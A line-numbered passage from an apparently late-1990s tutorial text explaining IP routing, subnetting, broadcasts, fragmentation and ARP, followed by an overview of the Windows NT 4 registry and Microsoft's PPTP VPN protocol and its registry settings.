1505will list 128.6.3.12 as
1506the gateway for many off-campus networks. However systems on net 128.6.4 will list 128.6.4.1 as
1507the gateway to those same off-campus networks. 128.6.4.1 is the gateway between networks
1508128.6.4 and
1509128.6.3, so it is the first step in getting to JvNC.
1510
1511When a computer wants to send a datagram, it first checks to see if the destination address is on
1512the system's own local network. If so, the datagram can be sent directly. Otherwise, the system
1513expects to
1514find an entry for the network that the destination address is on. The datagram is sent to the
1515gateway listed in that entry. This table can get quite big. For example, the Internet now includes
1516several hundred
1517individual networks. Thus various strategies have been developed to reduce the size of the
1518routing table. One strategy is to depend upon "default routes". Often, there is only one gateway
1519out of a network. This gateway might connect a local Ethernet to a campus-wide backbone
1520network. In that case, we don't need to have a separate entry for every network in the world. We
1521simply define that gateway as a "default". When no specific route is found for a datagram, the
1522datagram is sent to the default gateway. A default gateway can even be used when there are
1523several gateways on a network. There are provisions for gateways to send a message saying "I'm
1524not the best gateway -- use this one instead." (The message is sent via ICMP. See RFC 792.)
1525Most network software is designed to use these messages to add entries to their routing tables.
1526Suppose network 128.6.4 has two gateways, 128.6.4.59 and 128.6.4.1. 128.6.4.59 leads to
1527several other internal Rutgers networks. 128.6.4.1 leads indirectly to the NSFnet. Suppose we set
1528128.6.4.59 as a default gateway, and have no other routing table entries. Now what happens
1529when we need to send a datagram to MIT? MIT is network 18. Since we have no entry for
1530network 18, the datagram will be sent to the default, 128.6.4.59. As it happens, this gateway is
1531the wrong one. So it will forward the
1532datagram to 128.6.4.1. But it will also send back an error saying in effect: "to get to network 18,
1533use 128.6.4.1". Our software will then add an entry to the routing table. Any future datagrams to
1534MIT will then go directly to 128.6.4.1. (The error message is sent using the ICMP protocol. The
1535message type is called "ICMP redirect.")
1536
1537Most IP experts recommend that individual computers should not try to keep track of the entire
1538network. Instead, they should start with default gateways, and let the gateways tell them the
1539routes, as just
1540described. However this doesn't say how the gateways should find out about the routes. The
1541gateways can't depend upon this strategy. They have to have fairly complete routing tables. For
1542this, some sort of
1543routing protocol is needed. A routing protocol is simply a technique for the gateways to find each
1544other, and keep up to date about the best way to get to every network. RFC 1009 contains a
1545review of
1546gateway design and routing. However rip.doc is probably a better introduction to the subject. It
1547contains some tutorial material, and a detailed description of the most commonly-used routing
1548protocol.
1549
1550[2.1.8] Subnets and Broadcasting
1551Details about Internet Addresses: Subnets and Broadcasting
1552
1553As indicated earlier, Internet addresses are 32-bit numbers, normally written as 4 octets (in
1554decimal), e.g. 128.6.4.7. There are actually 3 different types of address. The problem is that the
1555address has to
1556indicate both the network and the host within the network. It was felt that eventually there would
1557be lots of networks. Many of them would be small, but probably 24 bits would be needed to
1558represent all the IP
1559networks. It was also felt that some very big networks might need 24 bits to represent all of their
1560hosts. This would seem to lead to 48 bit addresses. But the designers really wanted to use 32 bit
1561addresses. So they adopted a kludge.
1562
1563The assumption is that most of the networks will be small. So they set up three different ranges of
1564address. Addresses beginning with 1 to 126 use only the first octet for the network number. The
1565other three octets are available for the host number. Thus 24 bits are available for hosts. These
1566numbers are used for large networks. But there can only be 126 of these very big networks. The
1567Arpanet is one, and there are a few large commercial networks. But few normal organizations get
1568one of these "class A" addresses. For normal large organizations, "class B" addresses are used.
1569Class B addresses use the first two octets for the network number. Thus network numbers are
1570128.1 through 191.254. (We avoid 0 and 255, for reasons that we see below. We also avoid
1571addresses beginning with 127, because that is used by some systems for special purposes.) The
1572last two octets are available for host addesses, giving 16 bits of host address. This allows for
157364516 computers, which should be enough for most organizations. (It is possible to get more than
1574one class B address, if you run out.) Finally, class C addresses use three octets, in the range
1575192.1.1 to 223.254.254. These allow only 254 hosts on each network, but there can
1576be lots of these networks. Addresses above 223 are reserved for future use, as class D and E
1577(which are currently not defined).
1578
1579Many large organizations find it convenient to divide their network number into "subnets". For
1580example, Rutgers has been assigned a class B address, 128.6. We find it convenient to use the
1581third octet of the
1582address to indicate which Ethernet a host is on. This division has no significance outside of
1583Rutgers. A computer at another institution would treat all datagrams addressed to 128.6 the same
1584way. They would
1585not look at the third octet of the address. Thus computers outside Rutgers would not have
1586different routes for 128.6.4 or 128.6.5. But inside Rutgers, we treat 128.6.4 and 128.6.5 as
1587separate networks. In
1588effect, gateways inside Rutgers have separate entries for each Rutgers subnet, whereas
1589gateways outside Rutgers just have one entry for 128.6.
1590
1591Note that we could do exactly the same thing by using a separate class C address for each
1592Ethernet. As far as Rutgers is concerned, it would be just as convenient for us to have a number
1593of class C
1594addresses. However using class C addresses would make things inconvenient for the rest of the
1595world. Every institution that wanted to talk to us would have to have a separate entry for each one
1596of our
1597networks. If every institution did this, there would be far too many networks for any reasonable
1598gateway to keep track of. By subdividing a class B network, we hide our internal structure from
1599everyone else,
1600and save them trouble. This subnet strategy requires special provisions in the network software. It
1601is described in RFC 950.
1602
16030 and 255 have special meanings. 0 is reserved for machines that don't know their address. In
1604certain circumstances it is possible for a machine not to know the number of the network it is on,
1605or even its
1606own host address. For example, 0.0.0.23 would be a machine that knew it was host number 23,
1607but didn't know on what network.
1608
1609255 is used for "broadcast". A broadcast is a message that you want every system on the
1610network to see. Broadcasts are used in some situations where you don't know who to talk to. For
1611example, suppose
1612you need to look up a host name and get its Internet address. Sometimes you don't know the
1613address of the nearest name server. In that case, you might send the request as a broadcast.
1614There are also cases where a number of systems are interested in information. It is then less
1615expensive to send a single broadcast than to send datagrams individually to each host that is
1616interested in the information. In order to send a broadcast, you use an address that is made by
1617using your network address, with all ones in the part of the address where the host number goes.
1618For example, if you are on network 128.6.4, you would use 128.6.4.255 for broadcasts. How this
1619is actually implemented depends upon the medium. It is not possible to send broadcasts on the
1620Arpanet, or on point to point lines. However it is possible on an Ethernet. If you use an Ethernet
1621address with all its bits on (all ones), every machine on the Ethernet is supposed to look at that
1622datagram.
1623
1624Although the official broadcast address for network 128.6.4 is now 128.6.4.255, there are some
1625other addresses that may be treated as broadcasts by certain implementations. For convenience,
1626the standard
1627also allows 255.255.255.255 to be used. This refers to all hosts on the local network. It is often
1628simpler to use 255.255.255.255 instead of finding out the network number for the local network
1629and forming a
1630broadcast address such as 128.6.4.255. In addition, certain older implementations may use 0
1631instead of 255 to form the broadcast address. Such implementations would use 128.6.4.0 instead
1632of 128.6.4.255 as the broadcast address on network 128.6.4. Finally, certain older
1633implementations may not understand about subnets. Thus they consider the network number to
1634be 128.6. In that case, they will assume a broadcast address of 128.6.255.255 or 128.6.0.0. Until
1635support for broadcasts is implemented properly, it can be a somewhat dangerous feature to use.
1636
1637Because 0 and 255 are used for unknown and broadcast addresses, normal hosts should never
1638be given addresses containing 0 or 255. Addresses should never begin with 0, 127, or any
1639number above 223. Addresses violating these rules are sometimes referred to as "Martians",
1640because of rumors that the Central University of Mars is using network 225.
1641
1642[2.1.9] Datagram Fragmentation and Reassembly
1643
1644TCP/IP is designed for use with many different kinds of network. Unfortunately, network
1645designers do not agree about how big packets can be. Ethernet packets can be 1500 octets long.
1646Arpanet packets have a maximum of around 1000 octets. Some very fast networks have much
1647larger packet sizes. At first, you might think that IP should simply settle on the smallest possible
1648size. Unfortunately, this would cause serious performance problems. When transferring large
1649files, big packets are far more efficient than small ones. So we want to be able to use the largest
1650packet size possible. But we also want to be able to handle networks with small limits.
1651
1652There are two provisions for this. First, TCP has the ability to "negotiate" about datagram size.
1653When a TCP connection first opens, both ends can send the maximum datagram size they can
1654handle. The
1655smaller of these numbers is used for the rest of the connection. This allows two implementations
1656that can handle big datagrams to use them, but also lets them talk to implementations that can't
1657handle them. However this doesn't completely solve the problem. The most serious problem is
1658that the two ends don't necessarily know about all of the steps in between. For example, when
1659sending data between Rutgers and Berkeley, it is likely that both computers will be on Ethernets.
1660Thus they will both be prepared to handle 1500-octet datagrams. However the connection will at
1661some point end up going over the Arpanet. It can't handle packets of that size. For this reason,
1662there are provisions to split datagrams up into pieces. (This is referred to as "fragmentation".) The
1663IP header contains fields indicating the datagram has been split, and enough information to let
1664the pieces be put back together. If a gateway connects an Ethernet
1665to the Arpanet, it must be prepared to take 1500-octet Ethernet packets and split them into pieces
1666that will fit on the Arpanet. Furthermore, every host implementation of TCP/IP must be prepared
1667to accept pieces and put them back together. This is referred to as "reassembly".
1668
1669TCP/IP implementations differ in the approach they take to deciding on datagram size. It is fairly
1670common for implementations to use 576-byte datagrams whenever they can't verify that the
1671entire path is able to
1672handle larger packets. This rather conservative strategy is used because of the number of
1673implementations with bugs in the code to reassemble fragments. Implementors often try to avoid
1674ever having fragmentation occur. Different implementors take different approaches to deciding
1675when it is safe to use large datagrams. Some use them only for the local network. Others will use
1676them for any network on the same campus. 576 bytes is a "safe" size, which every
1677implementation must support.
1678
1679[2.2.0] Ethernet encapsulation: ARP
1680
1681There was a brief discussion earlier about what IP datagrams look like on an Ethernet. The
1682discussion showed the Ethernet header and checksum. However it left one hole: It didn't say how
1683to figure out
1684what Ethernet address to use when you want to talk to a given Internet address. In fact, there is a
1685separate protocol for this, called ARP ("address resolution protocol"). (Note by the way that ARP
1686is not an IP protocol. That is, the ARP datagrams do not have IP headers.)
1687
1688Suppose you are on system 128.6.4.194 and you want to connect to system 128.6.4.7. Your
1689system will first verify that 128.6.4.7 is on the same network, so it can talk directly via Ethernet.
1690Then it will look up 128.6.4.7 in its ARP table, to see if it already knows the Ethernet address. If
1691so, it will stick on an Ethernet header, and send the packet. But suppose this system is not in the
1692ARP table. There is
1693no way to send the packet, because you need the Ethernet address. So it uses the ARP protocol
1694to send an ARP request. Essentially an ARP request says "I need the Ethernet address for
1695128.6.4.7". Every system listens to ARP requests. When a system sees an ARP request for itself,
1696it is required to respond. So 128.6.4.7 will see the request, and will respond with an ARP reply
1697saying in effect "128.6.4.7 is
16988:0:20:1:56:34". (Recall that Ethernet addresses are 48 bits. This is 6 octets. Ethernet addresses
1699are conventionally shown in hex, using the punctuation shown.) Your system will save this
1700information in its
1701ARP table, so future packets will go directly. Most systems treat the ARP table as a cache, and
1702clear entries in it if they have not been used in a certain period of time.
1703
1704Note by the way that ARP requests must be sent as "broadcasts". There is no way that an ARP
1705request can be sent directly to the right system. After all, the whole reason for sending an ARP
1706request is that
1707you don't know the Ethernet address. So an Ethernet address of all ones is used, i.e. ff:ff:ff:ff:ff:ff.
1708By convention, every machine on the Ethernet is required to pay attention to packets with this as
1709an
1710address. So every system sees every ARP requests. They all look to see whether the request is
1711for their own address. If so, they respond. If not, they could just ignore it. (Some hosts will use
1712ARP requests to
1713update their knowledge about other hosts on the network, even if the request isn't for them.) Note
1714that packets whose IP address indicates broadcast (e.g. 255.255.255.255 or 128.6.4.255) are
1715also sent with an Ethernet address that is all ones.
1716
1717[3.0.0] Preface to the WindowsNT Registry
1718
1719This section is not meant for NT engineers that already know the registry, and its not meant for
1720people that have read the 800+ page books on the registry I’ve seen. This section is meant as a
1721quick guide to get people understanding exactly what this registry thing is.
1722
1723[3.0.1] What is the Registry?
1724
1725The windows registry provides for a somewhat secure, unified database that stores configuration
1726information into a hierarchical model. Until recently, configuration files such as WIN.INI, were the
1727only way to configure windows applications and operating system functions. In todays NT 4
1728environment, the registry replaces these .INI files. Each key in the registry is similar to bracketed
1729headings in an .INI file.
1730
1731One of the main disadvantages to the older .INI files is that those files are flat text files, which are
1732unable to support nested headings or contain data other than pure text. Registry keys can contain
1733nested headings in the form of subkeys. These subkeys provide finer details and a greater range
1734to the possible configuration information for a particular operating system. Registry values can
1735also consist of executable code, as well as provide individual preferences for multiple users of the
1736same computer. The ability to store executable code within the Registry extends its usage to
1737operating system system and application developers. The ability to store user-specific profile
1738information allows one to tailor the environment for specific individual users.
1739
1740To view the registry of an NT server, one would use the Registry Editor tool. There are two
1741versions of Registry Editor:
1742
1743.:Regedt32.exe has the most menu items and more choices for the menu items. You can search
1744for keys and subkeys in the registry.
1745
1746.:Regedit.exe enables you to search for strings, values, keys, and subkeys and export keys to
1747.reg files. This feature is useful if you want to find specific data.
1748
1749For ease of use, the Registry is divided into five seperate structures that represent the Registry
1750database in its entirety. These five groups are known as Keys, and are discussed below:
1751
1752[3.0.2] In Depth Key Discussion
1753
1754HKEY_CURRENT_USER
1755This registry key contains the configuration information for the user that is currently logged in. The
1756users folders, screen colors, and control panel settings are stored here. This information is known
1757as a User Profile.
1758
1759HKEY_USERS
1760In windowsNT 3.5x, user profiles were stored locally (by default) in the
1761systemroot\system32\config directory. In NT4.0, they are stored in the systemroot\profiles
1762directory. User-Specific information is kept there, as well as common, system wide user
1763information.
1764
1765This change in storage location has been brought about to parallel the way in which Windows95
1766handles its user profiles. In earlier releases of NT, the user profile was stored as a single file -
1767either locally in the \config directory or centrally on a server. In windowsNT 4, the single user
1768profile has been broken up into a number of subdirectories located below the \profiles directory.
1769The reason for this is mainly due to the way in which the Win95 and WinNT4 operating systems
1770use the underlying directory structure to form part of their new user interface.
1771
1772A user profile is now contained within the NtUser.dat (and NtUser.dat.log) files, as well as the
1773following subdirectories:
1774
1775? Application Data: This is a place to store application data specific to this particular user.
1776? Desktop: Placing an icon or a shortcut into this folder causes the that icon or shortcut to
1777appear on the desktop of the user.
1778? Favorites: Provides a user with a personlized storage place for files, shortcuts and other
1779information.
1780? NetHood: Maintains a list of personlized network connections.
1781? Personal: Keeps track of personal documents for a particular user.
1782? PrintHood: Similar to NetHood folder, PrintHood keeps track of printers rather than network
1783connections.
1784? Recent: Contains information of recently used data.
1785? SendTo: Provides a centralized store of shortcuts and output devices.
1786? Start Menu: Contains configuration information for the users menu items.
1787? Templates: Storage location for document templates.
1788
1789HKEY_LOCAL_MACHINE
1790This key contains configuration information particular to the computer. This information is stored
1791in the systemroot\system32\config directory as persistent operating system files, with the
1792exception of the volatile hardware key.
1793
1794The information gleaned from this configuration data is used by applications, device drivers, and
1795the WindowsNT 4 operating system. The latter usage determines what system configuration data
1796to use, without respect to the user currently logged on. For this reason the
1797HKEY_LOCAL_MACHINE regsitry key is of specific importance to administrators who want to
1798support and troubleshoot NT 4.
1799
1800HKEY_LOCAL_MACHINE is probably the most important key in the registry and it contains five
1801subkeys:
1802
1803? Hardware: Database that describes the physical hardware in the computer, the way device
1804drivers use that hardware, and mappings and related data that link kernel-mode drivers with
1805various user-mode code. All data in this sub-tree is re-created everytime the system is
1806started.
1807? SAM: The security accounts manager. Security information for user and group accounts and
1808for the domains in NT 4 server.
1809? Security: Database that contains the local security policy, such as specific user rights. This
1810key is used only by the NT 4 security subsystem.
1811? Software: Pre-computer software database. This key contains data about software installed
1812on the local computer, as well as configuration information.
1813? System: Database that controls system start-up, device driver loading, NT 4 services and OS
1814behavior.
1815
1816Information about the HKEY_LOCAL_MACHINE\SAM Key
1817
1818This subtree contains the user and group accounts in the SAM database for the local computer.
1819For a computer that is running NT 4, this subtree also contains security information for the
1820domain. The information contained within the SAM registry key is what appears in the user
1821interface of the User Manager utility, as well as in the lists of users and groups that appear when
1822you make use of the Security menu commands in NT4 explorer.
1823
1824Information about the HKEY_LOCAL_MACHINE\Security key
1825
1826This subtree contains security information for the local computer. This includes aspects such as
1827assigning user rights, establishing password policies, and the membership of local groups, which
1828are configurable in User Manager.
1829
1830HKEY_CLASSES_ROOT
1831
1832The information stored here is used to open the correct application when a file is opened by using
1833Explorer and for Object Linking and Embedding. It is actually a window that reflects information
1834from the HKEY_LOCAL_MACHINE\Software subkey.
1835
1836HKEY_CURRENT_CONFIG
1837
1838The information contained in this key is to configure settings such as the software and device
1839drivers to load or the display resolution to use. This key has a software and system subkeys,
1840which keep track of configuration information.
1841
1842[3.0.3] Understanding Hives
1843
1844The registry is divided into parts called hives. These hives are mapped to a single file and a .LOG
1845file. These files are in the systemroot\system32\config directory.
1846
1847Registry Hive File Name
1848=================================================================
1849HKEY_LOCAL_MACHINE\SAM SAM and SAM.LOG
1850HKEY_LOCAL_MACHINE\SECURITY Security and Security.LOG
1851HKEY_LOCAL_MACHINE\SOFTWARE Software and Software.LOG
1852HKEY_LOCAL_MACHINE\SYSTEM System and System.ALT
1853=================================================================
1854
1855Although I am not gauranteeing that these files will be easy to understand, with a little research
1856and patience, you will learn what you want to learn. I have been asked to write a file on how to
1857decipher the contents of those files, but I have yet to decide weather I will do it or not.
1858
1859QuickNotes
1860
1861Ownership = The ownership menu item presents a dialog box that identifies the user who owns
1862the selected registry key. The owner of a key can permit another user to take ownership of a key.
1863In addition, a system administrator can assign a user the right to take ownership, or outright take
1864ownership himself.
1865
1866REGINI.EXE = This utility is a character based console application that you can use to add keys
1867to the NT registry by specifying a Registry script.
1868
1869[3.0.4] Default Registry Settings
1870
1871The Following table lists the major Registry hives and some subkeys and the DEFAULT access
1872permissions assigned:
1873
1874\\ denotes a major hive \denotes a subkey of the prior major hive
1875
1876\\HKEY_LOCAL_MACHINE
1877
1878 Admin-Full Control
1879 Everyone-Read Access
1880 System-Full Control
1881
1882 \HARDWARE
1883
1884 Admin-Full Control
1885 Everyone-Read Access
1886 System-Full Control
1887
1888 \SAM
1889
1890 Admin-Full Control
1891 Everyone-Read Access
1892 System-Full Control
1893
1894 \SECURITY
1895
1896 Admin-Special (Write DAC, Read Control)
1897 System-Full Control
1898
1899 \SOFTWARE
1900
1901 Admin-Full Control
1902 Creator Owner-Full Control
1903 Everyone-Special (Query, Set, Create, Enumerate, Notify, Delete, Read)
1904 System-Full Control
1905
1906 \SYSTEM
1907
1908 Admin-Special (Query, Set, Create, Enumerate, Notify, Delete, Read)
1909 Everyone-Read Access
1910 System-Full Control
1911
1912\\HKEY_CURRENT_USER
1913
1914 Admin-Full Control
1915 Current User-Full Control
1916 System-Full Control
1917
1918\\HKEY_USERS
1919
1920 Admin-Full Control
1921 Current User-Full Control
1922 System-Full Control
1923
1924\\HKET_CLASSES_ROOT
1925
1926 Admin-Full Control
1927 Creator Owner-Full Control
1928 Everyone-Special (Query, Set, Create, Enumerate, Notify, Delete, Read)
1929 System-Full Control
1930
1931\\HKEY_CURRENT CONFIG
1932
1933 Admin-Full Control
1934 Creator Owner-Full Control
1935 Everyone-Read Access
1936 System-Full Control
1937
1938[4.0.0] Introduction to PPTP
1939
1940Point-To-Point Tunneling Protocol (PPTP) is a protocol that allows the secure exchange of data
1941from a client to a server by forming a Virtual Private Network (VPN) via a TCP/IP based network.
1942The strong point of PPTP is its ability to provide on demand, multi-protocol support over existing
1943network infrastructure, such as the Internet. This ability would allow a company to use the Internet
1944to establish a virtual private network without the expense of a leased line.
1945
1946The technology that makes PPTP possible is an extension of the remote access Point-To-Point
1947Protocol (PPP- which is defined and documented by the Internet Engineering Task Force in RFC
19481171). PPTP technology encapsulates PPP packets into IP datagrams for transmission over
1949TCP/IP based networks. PPTP is currently a protocol draft awaiting standardization. The
1950companies involved in the PPTP forum are Microsoft, Ascend Communications, 3Com/Primary
1951Access, ECI Telematics, and US Robotics.
1952
1953[4.0.1] PPTP and Virtual Private Networking
1954
1955The Point-To-Point Tunneling Protocol is packaged with WindowsNT 4.0 Server and Workstation.
1956PC's that are running this protocol can use it to securely connect to a private network as a
1957remote access client using a public data network such as the Internet.
1958
1959A major feature in the use of PPTP is its support for virtual private networking. The best part of
1960this feature is that it supports VPN's over public-switched telephone networks (PSTNs). By using
1961PPTP a company can greatly reduce the cost of deploying a wide area, remote access solution
1962for mobile users because it provides secure and encrypted communications over existing network
1963structures like PSTNs or the Internet.
1964
1965[4.0.2] Standard PPTP Deployment
1966
1967In general practice, there are normally three computers involved in a deployment:
1968
1969? a PPTP client
1970? a Network Access Server
1971? a PPTP Server
1972
1973note: the network access server is optional, and if NOT needed for PPTP deployment. In normal
1974deployment however, they are present.
1975
1976In a typical deployment of PPTP, it begins with a remote or mobile PC that will be the PPTP
1977client. This PPTP client needs access to a private network by using a local Internet Service
1978Provider (ISP). Clients who are running the WindowsNT Server or Workstation operating systems
1979will use Dial-up networking and the Point-To-Point protocol to connect to their ISP. The client will
1980then connect to a network access server which will be located at the ISP (Network Access
1981Servers are also known as Front-End Processors (FEPs) or Point-Of-Presence servers (POPs)).
1982Once connected, the client has the ability to exchange data over the Internet. The Network
1983Access Server uses the TCP/IP protocol for the handling of all traffic.
1984
1985After the client has made the initial PPP connection to the ISP, a second Dial-Up networking call
1986is made over the existing PPP connection. Data sent using the second connection is in the form
1987of IP datagrams that contain PPP packets, referred to as encapsulated PPP. It is this second call
1988that creates the virtual private network connection to a PPTP server on the private company
1989network. This is called a tunnel.
1990
1991Tunneling is the process of exchanging data to a computer on a private network by routing them
1992over some other network. The other network routers cannot access the computer that is on the
1993private network. However, tunneling enables the routing network to transmit the packet to an
1994intermediary computer, such as a PPTP server. This PPTP server is connected to both the
1995company private network and the routing network, which is in this case, the Internet. Both the
1996PPTP client and the PPTP server use tunneling to securely transmit packets to a computer on the
1997private network.
1998
1999When the PPTP server receives a packet from the routing network (Internet), it sends it across
2000the private network to the destination computer. The PPTP server does this by processing the
2001PPTP packet to obtain the private network computer name or address information which is
2002encapsulated in the PPP packet.
2003
2004quick note: The encapsulated PPP packet can contain multi-protocol data such as TCP/IP,
2005IPX/SPX, or NetBEUI. Because the PPTP server is configured to communicate across the private
2006network by using private network protocols, it is able to understand Multi-Protocols.
2007
2008PPTP encapsulates the encrypted and compressed PPP packets into IP datagrams for
2009transmission over the Internet. These IP datagrams are routed over the Internet where they reach
2010the PPTP server. The PPTP server disassembles the IP datagram into a PPP packet and then
2011decrypts the packet using the network protocol of the private network. As mentioned earlier, the
2012network protocols that are supported by PPTP are TCP/IP, IPX/SPX and NetBEUI.
2013
2014[4.0.3] PPTP Clients
2015
2016A computer that is able to use the PPTP protocol can connect to a PPTP server two different
2017ways:
2018
2019? By using an ISP's network access server that supports inbound PPP connections.
2020? By using a physical TCP/IP-enabled LAN connection to connect to a PPTP server.
2021
2022PPTP clients attempting to use an ISP's network access server must be properly configured with
2023a modem and a VPN device to make the seperate connections to the ISP and the PPTP server.
2024The first connection is dial-up connection utilizing the PPP protocol over the modem to an Internet
2025Service Provider. The second connection is a VPN connection using PPTP, over the modem and
2026through the ISP. The second connection requires the first connection because the tunnel between
2027the VPN devices is established by using the modem and PPP connections to the internet.
2028
2029The exception to this two connection process is using PPTP to create a virtual private network
2030between computers physically connected to a LAN. In this scenario the client is already
2031connected to a network and only uses Dial-Up networking with a VPN device to create the
2032connection to a PPTP server on the LAN.
2033
2034PPTP packets from a remote PPTP client and a local LAN PPTP client are processed differently.
2035A PPTP packet from a remote client is placed on the telecommunication device physical media,
2036while the PPTP packet from a LAN PPTP client is placed on the network adapter physical media.
2037
2038[4.0.4] PPTP Architecture
2039
2040This next area discusses the architecture of PPTP under Windows NT Server 4.0 and NT
2041Workstation 4.0. The following section covers:
2042
2043? PPP Protocol
2044? PPTP Control Connection
2045? PPTP Data Tunneling
2046
2047Architecture Overview:
2048The secure communication that is established using PPTP typically involves three processes,
2049each of which requires successful completion of the previous process. This will now explain these
2050processes and how they work:
2051
2052PPP Connection and Communication: A PPTP client utilizes PPP to connect to an ISP by using a
2053standard telephone line or ISDN line. This connection uses the PPP protocol to establish the
2054connection and encrypt data packets.
2055
2056PPTP Control Connection: Using the connection to the Internet established by the PPP protocol,
2057the PPTP protocol creates a control connection from the PPTP client to a PPTP server on the
2058Internet. This connection uses TCP to establish communication and is called a PPTP Tunnel.
2059
2060PPTP Data Tunneling: The PPTP protocol creates IP datagrams containing encrypted PPP
2061packets which are then sent through the PPTP tunnel to the PPTP server. The PPTP server
2062disassembles the IP datagrams and decrypts the PPP packets, and the routes the decrypted
2063packet to the private network.
2064
2065PPP Protocol:
2066
2067The are will not cover in depth information about PPP, it will cover the role PPP plays in a PPTP
2068environment. PPP is a remote access protocol used by PPTP to send data across TCP/IP based
2069networks. PPP encapsulates IP, IPX, and NetBEUI packets between PPP frames and sends the
2070encapsulated packets by creating a point-to-point link between the sending and receiving
2071computers.
2072
2073Most PPTP sessions are started by a client dialing up an ISP network access server. The PPP
2074protocol is used to create the dial-up connection between the client and network access server
2075and performs the folloing functions:
2076
2077? Establishes and ends the physical connection. The PPP protocol uses a sequence defined in
2078RFC 1661 to establish and maintain connections between remote computers.
2079? Authenticates Users. PPTP clients are authenticated by using PPP. Clear text, encrypted or
2080MS CHAP can be used by the PPP protocol.
2081? Creates PPP datagrams that contain encrypted IPX, NetBEUI, or TCP/IP packets.
2082
2083PPTP Control Connection:
2084
2085The PPTP protocol specifies a series of messages that are used for session control. These
2086messages are sent between a PPTP client and a PPTP server. The control messages establish,
2087maintain and end the PPTP tunnel. The following list present the primary control messages used
2088to establish and maintain the PPTP session.
2089
2090 Message Type Purpose
2091PPTP_START_SESSION_REQUEST Starts Session
2092PPTP_START_SESSION_REPLY Replies to Start Session Request
2093PPTP_ECHO_REQUEST Maintains Session
2094PPTP_ECHO_REPLY Replies to Maintain Session Request
2095PPTP_WAN_ERROR_NOTIFY Reports an error in the PPP connection
2096PPTP_SET_LINK_INFO Configures PPTP Client/Server Connection
2097PPTP_STOP_SESSION_REQUEST Ends Session
2098PPTP_STOP_SESSION_REPLY Replies to End Session Request
2099
2100The control messages are sent inside of control packets in a TCP datagram. One TCP
2101connection is enabled between the PPTP client and Server. This path is used to send and receive
2102control messages. The datagram contains a PPP header, a TCP Header, a PPTP Control
2103message and appropriate trailers. The construction is as follows
2104
2105-----------------------------------
2106PPP Delivery Header
2107-----------------------------------
2108IP Header
2109-----------------------------------
2110PPTP Control Message
2111-----------------------------------
2112Trailers
2113-----------------------------------
2114
2115PPTP Data Transmission
2116
2117After the PPTP Tunnel has been created, user data is transmitted between the client and PPTP
2118server. Data is sent in IP Datagrams containing PPP packets. The IP datagram is created using a
2119modified version of the Generic Routing Encapsulation (GRE) protocol (GRE is defined in RFC
21201701 and 1702). The structure of the IP Datagram is as follows:
2121
2122---------------------------------------------------
2123PPP Delivery Header
2124---------------------------------------------------
2125IP Header
2126---------------------------------------------------
2127GRE Header
2128---------------------------------------------------
2129PPP Header
2130---------------------------------------------------
2131IP Header
2132---------------------------------------------------
2133TCP Header
2134---------------------------------------------------
2135Data
2136---------------------------------------------------
2137
2138By paying attention to the construction of the packet, you can see how it would be able to be
2139transmitted over the Internet as headers are stripped off. The PPP Delivery header provides
2140information necessary for the datagram to traverse the Internet. The GRE header is used to
2141encapsulate the PPP packet within the IP Datagram. The PPP packet is created by RAS. The
2142PPP Packet is encrypted and if intercepted, would be unintelligible.
2143
2144[4.0.5] Understanding PPTP Security
2145
2146PPTP uses the strict authentication and encryption security available to computers running RAS
2147under WindowsNT Server version 4.0. PPTP can also protect the PPTP server and private
2148network by ignoring all but PPTP traffic. Despite this security, it is easy to configure a firewall to
2149allow PPTP to access the network.
2150
2151Authentication: Initial dial-in authentication may be required by an ISP network access server. If
2152this Authentication is required, it is strictly to log on to the ISP, it is not related to Windows NT
2153based Authentication. A PPTP server is a gateway to your network, and as such it requires
2154standard WindowsNT based logon. All PPTP clients must provide a user name and password.
2155Therefore, remote access logon using a PC running under NT server or Workstation is as secure
2156as logging on from a PC connected to a LAN (theoretically). Authentication of remote PPTP
2157clients is done by using the same PPP authentication methods used for any RAS client dialing
2158directly into an NT Server. Because of this, it fully supports MS-CHAP (Microsoft Challenge
2159Handshake Authentication Protocol which uses the MD4 hash as well as earlier LAN Manager
2160methods.)
2161
2162Access Control: After Authentication, all access to the private LAN continues to use existing NT
2163based security structures. Access to resources on NTFS drives or to other network resources
2164require the proper permissions, just as if you were connected directly to the LAN.
2165
2166Data Encryption: For data encryption, PPTP uses the RAS "shared-secret" encryption process. It
2167is referred to as a shared-secret because both ends of the connection share the encryption key.
2168Under Microsoft’s implementation of RAS, the shared secret is the user password (Other
2169methods include public key encryption). PPTP uses the PPP encryption and PPP compression
2170schemes. The CCP (Compression Control Protocol) is used to negotiate the encryption used. The
2171username and password is available to the server and supplied by the client. An encryption key is
2172generated using a hash of the password stored on both the client and server. The RSA RC4
2173standard is used to create this 40-bit (128-bit inside the US and Canada is available) session key
2174based on the client password. This key is then used to encrypt and decrypt all data exchanged
2175between the PPTP client and server. The data in PPP packets is encrypted. The PPP packet
2176containing the block of encrypted data is then stuffed into a larger IP datagram for routing.
2177
2178PPTP Packet Filtering: Network security from intruders can be enhanced by enabling PPTP
2179filtering on the PPTP server. When PPTP filtering is enabled, the PPTP server on the private
2180network accepts and routes only PPTP packets. This prevents ALL other packet types from
2181entering the network. PPTP traffic uses port 1723.
2182
2183[4.0.6] PPTP and the Registry
2184
2185This following is a list of Windows NT Registry Keys where user defined PPTP information can be
2186found:
2187
2188KEY: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RASPPTPE\
2189 Parameters\Configuration
2190
2191Values: AuthenticateIncomingCalls
2192 DataType = REG_WORD
2193 Range = 0 - 1
2194 Default = 0
2195
2196Set this value to 1 to force PPTP to accept calls only from IP addresses listed in the
2197PeerClientIPAddresses registry value. If AuthenticateIncomingCalls is set to 1 and there are no
2198addresses in PeerClientIPAddresses, the no clients will be able to connect.
2199
2200 PeerClientIPAddresses
2201 DataType = REG_MULTI_SZ
2202 Range = The format is a valid IP address
2203
2204This parameter is a list of IP addresses the server will accept connections from.
2205
2206KEY: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\<adapter name>\
2207 Parameters\Tcpip
2208
2209Values: DontAddDefaultGateway
2210 DataType = REG_WORD
2211 Range = 0 - 1
2212 Default = 1
2213
2214When PPTP is installed, a default route is made for each LAN adapter. This parameter will
2215disable the default route on the corporate LAN adapter.
2216
2217 PPTPFiltering
2218 Key: <adaptername.\Paramters\tcpip
2219 ValueType: REG_WORD
2220 Valid Range: 0 - 1
2221 Default = 0
2222
2223This parameter controls whether PPTP filtering is enabled or not.
2224
2225 PPTPTcpMaxDataRetransmissions
2226 Key: Tcpip\Parameters
2227 ValueType: REG_WORD - Number of times to retransmit a PPTP packet.
2228 Valid Range: 0 - 0xFFFFFFFF
2229 Default: 9
2230
